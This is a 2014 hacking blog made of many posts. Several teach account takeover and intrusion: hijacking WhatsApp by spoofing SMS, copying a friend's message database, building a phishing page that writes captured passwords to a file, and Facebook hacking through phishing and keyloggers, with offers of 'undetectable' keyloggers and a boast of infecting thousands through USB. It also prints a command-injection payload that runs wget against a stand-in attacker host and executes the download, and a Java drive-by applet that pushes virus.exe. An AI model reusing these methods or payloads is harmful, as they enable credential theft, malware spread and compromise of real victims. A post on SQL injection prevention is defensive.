Wednesday, 30 April 2014

Use Whatsapp without Using Your Mobile Number By iSARG Uttam Nagar


Now you can use whatsapp without your mobile number,just do follow steps
.
First  download whatsapp on your device after that it will sends verification text to their server

Now just switch your mobile phone to flight mode or change your mobile message center number

Now after opening the app say to you to verify the app by alternative method

Then Choose “Verification Through Sms” Option and put your email address

Now the game start begin,Click on the “Cancel” just after putting email address

It will creates error in email verification method.So click on “Cancel” just after putting email address

Now Spoof the message (Google it )

After spoofing you will receives messages on your spoofed number

That’s all now enjoy your Whatsapp without using your number

Read Also-Download Temple Run For Pc

Hack The Conversation Of Whats App Account By iSARG Uttam Nagar


Now You can hack all conversation of your friend on whats app,this sounds really cool.To do so first you need to go on MicroSD card then click whatsapp and after that go on Database option.After this you will find two file as :

-msgstore-yyyy..dd..db.crypt
-msgstore.db.crypt


when you find these files just take it from your buddy’s phone,and now you can simply read all gossip of your buddy.

Best Whatsapp Tricks and Tips 2014 By iSARG Uttam Nagar




Lock Whatsapp with Password

So this is the first tip in the Whatsapp tricks and tips list.Password is must important for every Whatsapp users.and now you can use password for your whatsapp and with this you can remain secure and safe and prevent from unauthorized access.

Lock Whatsapp For Android

1.If you are android user then just Download Whatsapp Lock from android market

2.Install it and make your Whatsapp secure and safe

3.This is totally free to use app

Read Also-Download Subway Surfers For PC

Lock Whatapp For BlackBerry

Its very much same like android.Just Download lock for BlackBerry and install it on your phone.It also come free and user can lock his/her app with this lock app

Wednesday, 23 April 2014

How to make a Phisher or Fake Pages

Phishers are fake pages which are intentionally made by hackers to steal the critical information like identity details, usernames, passwords, IP address and other such stuff. As i mentioned intentional, which clearly means its illegal and its a cyber crime. Phishing is basically a social engineering technique to hack username and passwords by deceiving the legitimate users. Phishers are sent normally using spam or forged mails.

Note: This article is for educational purposes only, any misuse is not covered by isarg.

What is Phishing?
Phishing is basically derived from the word called Fishing which is done by making a trap to catch the fishes. Similarly in case of hacking, hackers make Phish pages (traps) to deceive the normal or unaware user to hack his account details. Phishing technique is advancing day by day, its really tough to believe that on what extent this technique is reached but this is always remains far away from normal internet users and most of hackers.
Most of hackers and computer geeks still believe that Phishing attempt can be easily detected by seeing the URL in address bar. Below are some myths that hacking industry still have about Phishing. I will mention only few because then article will become sensitive and major security agencies will flag my website for posting sensitive data. So i will only explain the facts, if you need the same you need to fill the form and give us assurance that you will not misuse it.

Myth's about Phishing among Computer Geeks and Hackers
1. Almost each and every Hacker or computer Geek, thinks that Phishing attempt can be detected by just having a look on the URL. Let me tell you friends it was old days when you recognize Phishers by seeing URL's. But nowadays recent development in Cross site scripting(XSS) and Cross site Script forgery has made it possible that we can embed our scripts in the URL of famous websites, and you must know scripting has no limitations. Below are some examples that you can do from scripting:
a. Embed a Ajax Keylogger into the main URL and user clicks on the URL, keylogger script will get executed and all the keystrokes of the user will get record.
b. Spoof the fake URL: If you are little bit good in scripting and web browser exploits recognition then this can be easily done. What you need to do you need to write a script which will tell web browser to open fake page URL whenever user opens some website like Facebook. Just you need to manipulate the host file and manipulate the IP address of that website from Host file(found in windows folder).
c. Simply retrieving the information saved in the web browser like saved passwords, and bookmarks etc. Just need to write a script which will explore the locations in Windows user profile (where actually the stored information of web browsers saved).
2. One biggest myth, when you enter the data into the fake page, it will show either some warning message or show login information is incorrect. Rofl, new phishers are bit smart, now they don't show warning messages, when you login through fake page. They will actually login you into your account, and simultaneously at the back end they will steal your information using batch scripts.

So  friends i think this is enough back ground about new phishing technologies. Let's learn how to make a basic Phisher of any website in less than one or two minutes.

Steps to make your own Phisher:
1. Open the website Login or Sign in page whose phisher you want to make. Suppose you pick Gmail.
2. Right click to view the source and simultaneously open notepad.
3. Copy all the contents of the source into the notepad file.
4. Now you need to search for word action in the copied source code. You will find something like below:
how to make phishers or fake pages
Manipulate action and method

Now in this line you need to edit two things, first method and then action. Method Post is used for security purposes which encrypts the plain text, so we need to change it to GET.
Action field contains the link to next page, where it should go when you click on login or press enter. You need to change it to something.php (say isarg.php).
5. Now save the above page.
6. Now open the Notepad again and paste the below code in that:
sample batch scripts for hacking account or password
Batch script for Phisher
7. Location contains the next page URL, where you wish to send to user and passwords.html will contains the passwords.
8. Now save this file as isarg.php as told in step number 4.
9. Now create an empty file and name it as passwords.html, where the password get stored.
10. Upload all the three file to any web server and test it.

Note: In case of facebook, it will show error after user login, for that you need to use tabnabbing trick.
Note: Always keep the extension correct, otherwise it will not work. So always use save as trick rather than save otherwise it will save files as isarg.php.txt.

Commands in Demand | All useful Windows commands, settings on 1 click



Commands in Demand provides non-technical users with easy access to more than 150 Windows commands and features that can be hard to find or time consuming to get to. The program includes shortcuts to terminate non-responsive applications, restart Windows Explorer, view/clear the clipboard, open a command prompt in a selected folder, access system folders, view TCP/IP configuration settings, etc.
It has a selections menu (sections) according to were its commands are related. If a command is related with more than one section and in order to be less confused, you may find the same command buttons more than one times.

commands in demand, all useful commands

 Here are some of the commands that are available in your demand:
» Applications’ Shortcuts creator to minimize apps in the SysTray
» Clipboard real-time Editing
» Color Sample Picker
» Command Prompt starter in any folder of the System
» Desktop Icons Refreshing
» Desktop Shortcuts Copy to a desirable folder
» Device Manager with Hidden Devices
» Hide / Show Desktop Icons
» Icons Extraction from files
» Images Conversion of known formats
» Internet Searching with Two Engines simultaneously
» List Alphabetizer Application
» Memory and CPU Info
» Memory Instantly Cleaning
» Non-Responding Applications Killing
» Running Processes Killing
» Safely Removal of USB Drives
» Screenshots of whatever is visible
» System Drives Quick Cleaning
» System instant General Refresh
» System’s Clock Hiding
» System’s Volume Mute
» Taskbar Hiding
» Transparency Level to the Active window
» Transparency Level to the Taskbar
» URL Shortcuts creation
» User’s and Common System Folders browsing
» Windows commonly used and hidden applications starter
» WinLogoKey shortcuts simulator

Saturday, 19 April 2014

Facebook account Password hacking techniques





Hi friends, I have already posted two posts on How to hack Facebook account password, first using the Keyloggers and other is using Phishing on my other website isoftdl. Today I am going to reveal all the methods used by hackers to hack a Facebook account password.
If you know these methods then you can protect yourself from getting hacked and save your Facebook account password.
Today I will discuss all general methods to Hack Facebook Account Password that all hackers usually use to hack your Facebook account.
1. Facebook Phishing Attack
2. Hacking Facebook account password remotely using Keyloggers and RAT's
3. By hacking the primary email address that user has used for creating Facebook account.
4. Social Engineering or simply Guessing your friends Password.

how to hack facebook account passwords using phishing, keyloggers and other hacking tools
4 ways to Hack Facebook account Password

Facebook Phishing Attack:
I am explaining this method first because its the most easiest and also the most popular method for hacking Facebook password. You can also search on Google the various famous Facebook hacking methods and you will find Phishing technique on the top always. And I am explaining the methods according to their popularity.
Now you want to know which is my favorite method for Hacking Facebook account passwords and i will undoubtedly tell its simply PHISHING.
I will recommend my users to read this post for knowing how to hack Facebook using Phishing as i have explained it in detail here on my other website:

    How to hack Facebook accounts or Passwords using Phishing


If you want latest Facebook phisher then subscribe my Hacking tricks and mail me privately or post your email below in comments. I will provide you within a day, Now why i am not providing it directly, if i provide directly then Facebook will block it again like the previous one.


Hacking Facebook account password remotely using Keyloggers and RAT's
Aaw... Best method for advanced Hackers. And my second favorite too. Its popularity is little but lower than Phishing only because it involves you to download hack tool and then create your keylogger and send it to victim which is a lengthy process and also unsecured too as you don't aware that the keylogger that you downloading is himself contain some spyware or simply a keylogger attached with it. Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded keystrokes to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use these logs to get required Facebook password and thus can hack Facebook password.

I have written a complete article on How to hack Facebook accounts remotely using Keyloggers, so i will recommend you to go through that if you want to learn this technique in detail, so read this article on my other website:

    How to Hack Facebook accounts or Passwords remotely using Keyloggers


Now if you need latest Fully Undetectable Keylogger, then subscribe my hacking tricks and mail me privately or post ur email ID below in comments on which you want to get the download link.

Hacking the Primary Email address
If Facebook hacker or any specific Keylogger, by some means, hacks your primary Gmail or yahoo account which you are using as primary email address, then this information account can easily hack your Facebook password using "Forgot password" trick. The Hacker will simply ask Facebook to send password to the primary email address and ask Facebook administrators to send the reset email to your primary email address- which is already hacked. Thus, your Facebook account password will be reset and it will also be hacked !

So, always remember to protect your primary email address that you have used to create Facebook account and try to keep unknown or useless mail id as your primary email address in Facebook.

Social Engineering or Guessing Passwords
This method sounds to be pretty not working at beginning. Even I was neglecting this way for a long time . But, once, I thought of using it against my friend on Facebook and amazingly what happened that i guessed his Facebook password very easily by this method. I think many of you might be knowing how what this social engineering, For novice hackers, Social engineering is method of retrieving password or Guessing the password or answer of security question simply be hacking some information about the victim or simply gathering his information from his own Facebook and other social networking profiles where most of users provide their critical information just for fashion and doesn't know its consequences. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.

Some Common passwords that you can try on your friends are :
1. Their mobile number or their girlfriend or boyfriend mobile number. (always try his previous or old mobile number as they are not as much as fool that they appears)
2. Their Girlfriend or boyfriend names or their own names concatenating with their Girlfriend or boyfriend names.
3. Date of births
4. Their favorite movie names , cartoon character names or favorite music band names or simply the hero names like batman,dark knight, Superman,Godzilla, Spartacus and much more..
5. Most important now most website ask that password should be alphanumeric now what users do they just adds 1,2,3 in their normal passwords and some more smart guys adds !,@,# in their passwords and amazingly all in Sequence.

Note the above common passwords are not from any internet resource, its by my own case study that i have come to conclusion after hacking 19,788 emails accounts. I know now you want to know how i hacked so much accounts. As i have already mentioned for advanced hackers second option is best and the only thing that i did was just made my Keylogger USB and pendrive spreadable. Who ever used the infected USB drive also got infected and this procedure goes so on. And last what happened my 10Gb free storage was filled and i don't have enough time to clean it regularly.

How to Install Backtrack on Virtual Box Tutorial

Backtrack is backbone of hackers. If you don't use it then stop calling yourself as Hacker. In our BEHC campaign, i have told you that we will be using Backtrack as our secondary OS i.e. virtual machine for performing advance hacking techniques. Most of people faced problem in installing Backtrack 5 r3. Today, i will guide you how to install Backtrack Operating system on Virtual Box or any other Virtual machine. Let's start...

Install Backtrack

Basic things before beginning installation:
1. Virtual Box
2. Backtrack Linux OS ISO image or DVD

Now lets learn stepwise, how to install Backtrack Linux on Virtual Box:
1. First of all open the Virtual Box by clicking on Virtual box icon ( will come after installing virtual box).

2. Now for first time we need to create Virtual Machine (Virtual Operating system on which we will install Backtrack).

To do so Click on New button  then a pop up will open. In Name fill anyname that you wish to give to your virtual Machine say Hackingloops. Select Type as Linux and Version as Other Linux. Sample is shown below:
Install Backtrack on VM
Create new VM

 On Clicking Next Select the Ram according, for best optimized performance try to allocate more i.e. anything between 1 GB to 3 GB. Say i allocated 3 GB(Maximum for 32 Bit).

Select Ram for VM

Then click on Next Button as highlighted. Now Proceed as shown in snapshots.

Select Create Virtual Drive

As shown above click on Create :

Select VDI

 Select VDI (Virtual Disk Image) and Click on Next.

select dynamically allocated option

Now select Dynamically Allocated as shown above.

Assign Hard Drive Size for VM
Now assign the Virtual Hard Disk size as shown above, 20GB will be Good for optimization. Now When you click on Create Virtual Machine will be created as shown Below.

Configure Internet Settings on VM


To enable internet over the Virtual Machine, we need to configure the Network as shown below :


Configure Internet Settings(Bridge Adapter) on VM

After doing network settings, we need to assign Backtrack ISO image to VM's Disk drive to begin the setup on starting the setup. To assign Backtrack ISO to VM's Disk drive, do the settings as shown below:


Assign Backtrack ISO image to Disk Drive

Now the basic settings of Virtual Machine Over. Now Let's begin Backtrack Installation on this VM. For this Click on Start Button on Top of Virtual Box, then you will see something like below :


Backtrack Installation
Backtrack Live CD starts

Press Enter to proceed, now you will see Backtrack Setup Menu, Select Backtrack Text Mode : Default Boot (first in the menu) and press enter :

Select Backtrack Text

Now set up will Begin.
In Case of  Intels I-series processors say I3, I5, I7 etc. You will get an error Message that
"This kernel requires an x86-64 CPU, but only detected an i686 CPU"
For correcting this, you have follow below steps :
1. Restart your Computer or Laptop, During Boot select the Boot setting usually Esc key or F1 or F2 key.
2. In Boot Menu Settings, Enable the Visualization.
3. Save the Boot Setting and start your PC or laptop.
4. Start Virtual Box and Begin from last step by selecting Backtrack Text - Default Boot text Mode.

When Kernel starts you will see something like below :
Backtrack Live CD starts


In root@bt: type startx and press enter to start Backtrack Live CD in GUI mode as shown below :


Give Startx to begin GUI mode

Now you will see the Desktop of Backtrack Live CD. If you want to use only Live CD features you can do so right now. But if you want to use Backtrack to full then we need to install Full backtrack. For that Click on Install Backtrack Icon on Desktop  as shown below:


Click Install Backtrack Icon to Begin Set up

Now 7 Step set up will begin (just basic settings as shown below). Do as shown in next 7 Screen Shots:


Select English Language

Click Forward :

Select Region and Time zone

Set Region and Time Zone, then Click on forward :

Set Keyboard layout

Select Keyboard Settings, deafult US and click forward:

Select Erase VBOX Harddisk


Click Forward :
Finish Backtrack Installation by clicking Install
Final Step Click on Install

At last Click on Install and Sit back for 15 to 20 minutes to let the set up. Once the set up is over your VM is ready.
That's all the installation of Backtrack on Virtual Machine. Its just one time procedure.
From Next time Just Click on Start Your Virtual Machine to start Backtrack.
Note : From Next time Please select the Hard Drive Boot Option from the Kernel Menu. Next it will ask you for BT Login: , Give root as BT login and toor as BT password and On starting Backtrack you need to give command Startx at command prompt. Have Fun!

Wednesday, 16 April 2014

Hack websites using Command Injection


Hey friends, previously i have explained how to use SQL injection and XPath Injection to hack websites. Today i will teach you another type of injection technique that if executed properly can give you complete ownership of victim's website, called Command Injection. When user input is used as a part of system command, an hacker may inject system commands into the user input..Ahh..confusing...:P Lets understand in clear and simple words..

What is Command Injection?
Command injection is an attack method in which we alters the dynamically generated content on a Web page by entering shell commands into an input mechanism, such as a form field that lacks effective validation constraints. We can exploit that vulnerability to gain unauthorized access to data or network resources. When users visit an affected Web page, their browsers interpret the code, which may cause malicious commands to execute in the users' computers and across their networks. The purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable website. In situation like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it as any authorized system user. However, commands are executed with the same privileges and environment as the application has. Command injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker (forms, cookies, HTTP headers etc.).

hack websites using command injection
Command Injection Tutorial for Hackers

This can happen in any programming language but its very common in PERL, PHP and shell based CGI. It is less common in Java, Python and C++ ..:P i haven't tried it yet there :D tried once or twice but not able to do so, that why uncommon..:P.

Lets understand things using examples
Consider the below PHP code:

    <?PHP
    $email_subject ="Welcome to Isarg uttamnagar";

    if  ( isset ($_GET {'email'} ) ) {
    system( "mail " + $_GET {'email'}) + "-s ' " + $email_subject +
    " ' < /tmp/email_body", $return_val);
    }
    ?>

The above code is an example where user sends his or her email address in the email parameter, and that user input is directly placed in the system command. Ahh... loophole...
Now similar to SQL injection or XPath injection, our goal is to inject the shell command into the email parameter but make sure code before and after the email parameter remain syntactically correct otherwise the injection will not execute.
Consider the system( ) call as small jigsaw puzzle game where we arrange different puzzle part to make a single image. All the parts except one part are on its place, now we have to find the middle part to finish the puzzle.. :D simple task in game but little tricky in command injection. So our objective is something shown below:

    mail  [missing puzzle part]  -s  'Welcome to Isarg uttamnagar'  </tmp/email_body

Note: For the missing puzzle part, we need to ensure that the mail command runs properly and exits properly basically i want to focus on syntax, it should be syntactically correct.

For example mail  --help will runs and exits properly. Now we can add other additional shell commands by separating the commands by a semi colon (;).
We can also comment the missing puzzle part using the shell commenting symbol (#) in front. So we can manipulate the missing puzzle part as below:

    --help; wget http://somehackersite.com/attack_program;  ./attack_program #

Now the adding our missing puzzle part to our original existing shell command, the below shell command is created:

    mail --help; wget http://somehackersite.com/attack_program; ./attack_program # s 'Welcome to Isarg uttamnagar' < /tmp/email_body


This resulting command is equivalent to below command:

    mail --help; wget http://somehackersite.com/attack_program; ./attack_program

Now what the above command will do..:P You all guys are just reading things like novice hackers.. Any Guess...:P ok..let me explain..
The above shell command will runs the mail --help and then downloads the attack program from somehackersite.com  and executes it on victim, allowing the hacker to perform the arbitrary commands on the vulnerable website. In most cases provide the complete access to the root directory..:P Now do whatever you want to do..
That's all my friends. I hope that you all have enjoyed the tutorial, if you have any doubts or queries ask me in form of comments.
Copy Cats its last warning from Isarg uttamnagar, stop copying our articles, if you copy articles always mention the source. Otherwise get ready for DMCA penalty and negative rating on Google.

How Hackers Spread Java Drive by Malware online

We are back with a new tutorial. Well making a malicious virus is one thing but how to spread it? Or how hackers hunt for victims? Well you will definitely be disappointed when you’ll know that this trick fails sometimes! Victims are now mostly aware of the old social engineering stuff.  But cheers up my friend there's no end, i will show you a very effective methods that Hackers  use to spread malicious viruses/worms.  But first of all we should know what is Java Drive by Malware?

What is Java drive by?
A Java Drive-By is a Java Applet that is coded in Java, when placed on a website. Once you click "Run" on the pop-up, it will download a program off the internet. This program can be used to spread a virus and malware effectively and has been spotted in the wild. We can execute .exe files in victims’ computer without their permission with the help of java drive by. You can see the image of error below this:

Java Drive by Malware
Jave Drive By
Okay so whats the scenario behind this? well this is a java script in the source which pop ups the error, So lets learn how to do the job. 

Tools Needed :
i) a .jar file which is the main player of this game. Download it from here 

    http://www.mediafire.com/?mmafl2carb1s159

ii) A shelled web where you will upload files for JAVA DRIVE BY! Plus you should know basic HTML to make a attractive web page. iii) A java script which is the backbone of your game.
Now lets get started, Upload you .jar file on the shelled web, than create a fake webpage its up to you how you much you make fake webpage attractive, but you have to add the java code due to which the pop up error will appear.

Java Code :

    <APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
        <PARAM NAME = "AMLMAFOIEA" VALUE = "http://www.yoursite.com/virus.exe">

So add the above code in your face webpage, just make some changes replace VALUE = "http://www.yoursite.com/virus.exe" with your virus like the image below:

Malicious code of Java Drive by Attack

 So this is it! Simplest and most effective method used by attackers to spread your malicious software.

Prevent SQL Injection attacks by iSARG Uttam Nagar


SQL Injection is the most common and most popular website attacking technique used by Hackers to Hack websites and own website's databases. SQL Injection's attacks are popular because of its 4 rules i.e. easy to exploit, hard to secure, coders negligence and most important lack of knowledge on secured coding. 100's of websites are there on internet which teaches you how to perform SQL injection to hack websites but only quite a few who teaches you how to prevent SQL injection. The only reason behind that People know how to exploit because its damn easy but they don't know how to secure it. According to survey held on Injection Attacks in March 2013 by IT Security Companies, survey results were really shocking.  Note : This survey was only for web developers and approximately 60 thousand web developers participated in it.

        60% developers never listened the word "SQL Injection".
        Out of 40%, 14% Web developers don't know "What is SQL Injection?".
        Out of 26% Web Developers who knows SQL Injection, 17% does not know how to prevent SQL injection, 3% said they have security teams to look into vulnerabilities.
        Only 6% Web developers know What is SQL Injection and How to prevent their websites from SQL Injection.


That was survey data based on very basic objective questionnaire, Imagine what will the actual scenario. Frankly speaking, at max 3-4% web developers know how to protect or prevent SQL Injection i.e. secure coding.


Prevent SQL Injection
Prevent SQL Injection

But friends, there is no need to worry about SQL Injections. After reading this articles you can proudly say that you are among those 3-4% coders who know secure coding standards. But before everything you must know what is SQL injection and what's its scope i.e. how much severe damage it can do to your website and database.

SQL Injection : Basic Introduction

First of all let's understand the words separately i.e. break the word SQL Injection into SQL + Injection. What is SQL? SQL stands for Structured Query Language, its used to query and manipulate the relational database. By querying, i meant selecting data from database based on some conditions. By manipulating, i meant updating, deleting, inserting etc on database.
Injection as the word implies injecting something extra into something. In case of SQL Injection, it means injecting an extra piece of code into SQL query to manipulate its behavior from existing. So this gives us basic idea that SQL injection will going to put something extra in our existing SQL query and what we have to do is to handle this extra code from altering the actual SQL. But you guys were still be thinking that how an injection impact our query. Here are two God Principle's why SQL injection occurs:

    "SQL Injection can attack those SQL queries which are dynamically created by using some inputs from either program or user or some functionality."


    "SQL Injection can also occur if escape sequences and types are not handled properly in the SQL query."


Let us learn two God Principles in detail:
Dynamic SQL Queries
I am sure most of you have heard this term but still for newbies i will explain them what dynamic SQL is.
Dynamic SQL is an SQL code which generated within an web application or from the system tables and then executed or run against the database to manipulate the data. The SQL code is not stored in the source program, but rather it is generated based on user input. This can include determining not only what objects are involved, but also the filtration criteria and qualifiers that define the set of data being acted on.
Using Dynamic SQL, we can create powerful web applications that allow us to create database objects and manipulate them based on user input.
Wow what an feature it is? Is that really going in you mind. If yes then calm down. Every dynamic query increases the SQL injection attack surface and make your website prone to SQL Injection attack. But How?

Consider an example: Consider the below dynamic SQL

    String query = "SELECT * FROM items WHERE owner = "'" + userName + "' AND itemname = '" + ItemName.Text + "'";
    Statement stmt = connection.createStatement();

    ResultSet rs = stmt.executeQuery(query);


When the above query executes, this will result into below SQL query:


    SELECT * FROM items WHERE owner = AND itemName = ;

means above query will extract all those results from "Items" table where owner name and itemname are empty or spaces. The above SQL statement is correct but is it secured?? Think about it.

Off course its not secured. If you look above statement closely, the above statement only behaves correctly if itemName does not contain a single-quote character. But why?? Everything looks good. Its because above dynamic query is made by concatenating a constant base query string and a user input string.

Since itemName variable is not correctly validated that means if Hacker enters something that results in always true, the query will result into yielding all the itemNames in the table. Don't understand always true concept? Consider an example say itemName is an character field then what about 'a' ='a' . Since a will always equal to a, this condition will always return true. Now what if we concatenate this to itemName for some user say "Lokesh". So, the query becomes something like below:

    SELECT * FROM items
     WHERE owner = 'Lokesh'
     AND itemName = 'a'='a';


Then what about if Lokesh is admin of the website and he's the person who added all these items. Then query will become :


    SELECT * FROM items;

which is absolutely a generalized query that will result into sharing of everything inside Items table.

Isn't it dangerous? Off course it is! But How to prevent this? There are several ways of preventing it below is one example using prepared statements. How will the dynamic query look like :

    PreparedStatement stmt = connection.prepareStatement("SELECT * FROM items WHERE owner = ? AND itemName=?");
    stmt.setString(1, userName);
    stmt.setString(2, itemName);
    ResultSet rs = stmt.executeQuery();


This code is not vulnerable to SQL Injection because it correctly uses parameterized queries. This just an example, we will discuss all preventive measures in detail in coming articles.

Incorrectly Filtered Escape Sequences or Types
First of all we must understand what are escape sequences?  Escape sequences are those characters which alters the normal behavior of the characters.
Escape sequences use an escape character to change the meaning of the characters which follow it, meaning that the characters can be interpreted as a command to be executed rather than as data.

Escape characters are different for different types of databases like oracle, mySQL, SQL server etc. We will discuss here for mySQL as its the most popular one and its free.

MySQL supports two types of Escaping modes:
1. ANSI_QUOTES SQL Mode
2. MySQL mode

ANSI_QUOTES Mode : It encodes all single quote in the SQL with double quotes. But its rarely used, we will discuss it later why its rarely used because this type of escape sequence filtering is not considered completely fail safe.

MySQL Mode : In MySQL, the MySQL mode is turned on by default for handling escape sequences. It uses below encoding pattern, usually its by default but sometimes you have to manually encode these:

     NUL (0x00) --> \0 
     BS   (0x08) --> \b
     TAB (0x09) --> \t
     LF    (0x0a) --> \n
     CR   (0x0d) --> \r
     SUB (0x1a) --> \Z
     "      (0x22) --> \"
     %    (0x25) --> \%
     '      (0x27) --> \'
     \      (0x5c) --> \\
     _     (0x5f) --> \_
     all other non-alphanumeric characters with ASCII values less than 256  --> \c
     where 'c' is the original non-alphanumeric character.

Escaping wildcard characters like LIKE keyword which collaborates '_' and '%' characters.

That was about escape sequences but let's see practically with an example how escape sequence allows an SQL injection attack.

This type of SQL injection vulnerability occurs when user input is not correctly validated for escape sequences mentioned above.
Consider an below example :

    String.query = "SELECT * FROM users WHERE name = '" + userName + "';"

    Statement stmt = connection.createStatement();

The above mentioned SQL query is designed to pull up the records of the specified username from its table of users. Its a correct query but is it secured?  No its not. The field userName is vulnerable to SQL injection because userName field's supplied user input is not properly handled for single quote escape character.

The above SQL can be manipulated to result in always true condition by just passing always true condition in userName field.

For example if we replace the '(single quote) by always true condition i.e. ' or '1'='1 then this will yield all the users in the database. The query will become something like :

    SELECT * FROM users WHERE name = ' ' OR '1'='1';


which is actually equivalent to

    SELECT * FROM users


Similar to Dynamic SQL queries. This can be prevented too using above concept or using standard functions available in PHP like mysql_query() function etc. This prevents attackers from injecting entirely separate queries, but doesn't stop them from modifying queries.

Similarly incorrectly handled type causes the SQL injection. Incorrect Type handling SQL injection occurs when a user-supplied field is not strongly typed or is not checked for type constraints. This could take place when a numeric field is to be used in a SQL statement, but the programmer makes no checks to validate that the user supplied input is numeric. For example :

     "SELECT * FROM userinfo WHERE id = " + a_variable + ";"
If you take a close look at the statement, you will find that author intended a_variable to be a number correlating to the "id" field. However, if it is in fact a string then the end-user may manipulate the statement as they choose, thereby bypassing the need for escape characters. And it will result into severe damage to database and even the whole web application.

So its always recommended that we must encode all escape sequences before using them in SQL code else it will result into SQL injection.

Note: These two God principles are not the ways for SQL injection, there are other things too but these are responsible for atleast 95% SQL injection attacks.

This was the First tutorial of the SQL Injection Prevention Tutorial, there are atleast 5 more to come in series so keep visiting for latest ones.

How to Open Adf.ly links in India and other countries







Adf.ly is an free money earning URL shortner service which pays its users for every visitor they bring to site. Few days back several International service providers specially in India, USA and U.K. has blocked Adf.ly sites because of spreading piracy and malware over the web. Today i will share multiple techniques to open Adf.ly links in India in other countries without using any proxy or third party software. So guys lets learn how to unblock Adf.ly website links in India. There are multiple ways to unblock it. But before that we must understand how ISP's block websites like ADF.LY etc..

How ISP's Block Website in Countries?
The process of blocking content for an ISP(Internet Service Provider) is very simple. After all, any content that is coming from a website to your computer has to travel through the ISP, giving it ample opportunity to observe and censor banned content.

Consider an example, you are on one side of river bank (i.e. Your Computer) and you have visit to other side of river (i.e. Internet where all websites and content is located). Now ISP( Internet service provider) is the bridge which connects your machine to the internet. So ISP has authority to allow you to cross the bridge to access the content or not. But we all know there are other ways too, to cross the river like swimming or flying or so on. Consider these other ways as bypassing the bridge i.e. ISP.

Each web page has a unique ID i.e IP address, like a licence plate. If the government tells the ISP to block a specific page, it’s added to the blacklist, and isn’t allowed on the bridge. The government could also block a full domain, such as Facebook.com, which would be like blocking all cars with DL plates, instead of specific numbers.

I hope you understands how ISP works. Now lets learn how to bypass Adf.ly website blocked by ISP's.

Method 1:  Changing normal web i.e. Http to secured web HTTPS
1. Say you want to visit the Adf.ly website link

http://adf.ly/

2. Just replace the Http by HTTPS and enter the url. Url will looks similar to below:

https://adf.ly/

3. That's all.

Method 2: Adding a sub-domain to the website.
1. Say you want to visit the Adf.ly website link

http://adf.ly/

2. Just add v2. in front of adf.ly link, it will open.

http://v2.adf.ly/

3. That's all.

So guys enjoys free web without any blockage. If you have any issues or queries ask me in form of comments. A note of appreciation is always welcomed.

Friday, 11 April 2014

Cool Mozilla Hacks | Hacking Mozilla Firefox


Hello Friends, Today i am sharing with you the latest hacks explored by me in Mozilla Firefox. I love to explore new things and see what happens, i discovers loop holes and cool tricks. I guarantee you that you have never tried to think in this fashion. So guys lets enjoy the latest mozilla hacks explored by iSARG Uttam Nagar


1. Browser In browser and again browser in browser and so on...


Enter the following string in to your Mozilla Firefox address bar and see what happens

    chrome://browser/content/browser.xul


I think you entered just once now enter again in the new browsers address bar and continue enjoying it.. Below is the snapshot of this hack:
latest mozilla firefox hacks and tricks
Browser in Browser hack in Mozilla Firefox

2. Special Effect Scrolling Mozilla Firefox
You will really love this effect...little bit irritating but awesome...as its isoftdl special by Lokesh uff LoneRusher or Destructive Mind....Just type below text in address bar of Mozilla..

    chrome://global/content/alerts/alert.xul


3. Display Cookies without any Cookie Manager
You can view cookies directly in Mozilla Firefox just by entering below text in the address bar..

    chrome://browser/content/preferences/cookies.xul


4. Check history of Mozilla Firefox directly through URL
Ahhah...Alternate way to view history in better way.. Just enter the below text into the address bar to see the History of visited websites....

    chrome://browser/content/history/history-panel.xul


5. Display all your bookmarks
We can view our bookmarks directly using below URL in address bar..

    chrome://browser/content/bookmarks/bookmarksPanel.xul


6. Advanced Tab using URL
You can directly view the advanced tab in firefox using below URL..

    chrome://browser/content/preferences/advanced.xul


7. Advanced Javascript settings:

    chrome://browser/content/preferences/advanced-scripts.xul


8. Setting for clearing History and Cookies and other stuff..

    chrome://browser/content/preferences/sanitize.xul

9. Change or view Font Settings in Firefox

    chrome://browser/content/preferences/fonts.xul

How to Enable Virtual Machine on I3, I5 or I7 Processors - Virtualization Concept






Hey friends, welcome back ! I am sure you all are missing me :) . I am not able to give ample amount of time to you guys because of my hectic schedule. But now you all have good news as i am back. In recent few months, many of my users have complaint that they are not able to use Virtual OS or Virtual machine on their Computers or Laptops. Because of this issue users are not able to install Backtrack Linux as Virtual OS on their machines. Today i will explain you how to enable Virtualization in your Machine.

Users having old processors i.e. before Intel's I series i.e. I3, I5 or I7 were not facing such issues because Virtualization was enabled by default but as the processors were upgraded major ROM manufacturers like Intel, Asus etc have made it an optional feature in their OS which is disabled by default. So whenever you try to install any virtual OS on your existing operating system you will get below error message:

    "This kernel requires an x86-64 CPU, but only detected an i686 CPU"

This error message comes when Virtualization is not enabled on your Boot Menu System Configuration.

Now you all must be confused what the hell is this Virtualization? Virtualization is a term that refers to the various techniques, methods or approaches of creating a virtual (rather than actual) version of something, such as a virtual hardware platform, operating system (OS), storage device, or network resources.

Now lets learn how to enable Virtualization on I3, I5 or I7 Processors or similar latest processors.

Steps to Enable Virtualization Technology:
 1. Start your computer and immediately start pressing Esc button(or F1 or F2 accordingly as per your system) to go to boot options.
2. Now you will see some options like below:

Boot Menu Options
                                                                                                                          
 Press F10 to go to BIOS setup.

3. After pressing F10 you will see something like below Main screen displaying details of your machine:

Main Bios Setup Menu

 Now use arrow keys to navigate to System Configuration menu. You will see System Configuration menu like below:

Default Virtualization Settings

Now as we can see default value of Virtualization technology is Disabled. To enable it use arrow keys to reach Virtualization Tech and press enter then you will see something like below:

Enable Virtualization Tech

Select using arrow key and press enter to enable. Now after its enable you will see something like below:

Virtualization Enabled Yes

Now save the settings by pressing F10 key and press enter.

4. That's all! Enjoy now Virtualization is enabled on your Computer.

Disable unwanted service in Windows 7 to speed up

Windows 7 enables services that aren’t necessarily required by default. You can relieve a huge amount of system resources by disabling these services or setting them to “Manual mode”. Configuring a service to this setting means, it doesn’t start automatically, but rather only when it is required.

How to Disable services:

    Access the “Start Menu“
    Type in “services.msc” in the search line and press “Enter“. (Alternately you can open the “Control Panel“, locate the “Administrative Tools” icon and click on “Services“.)
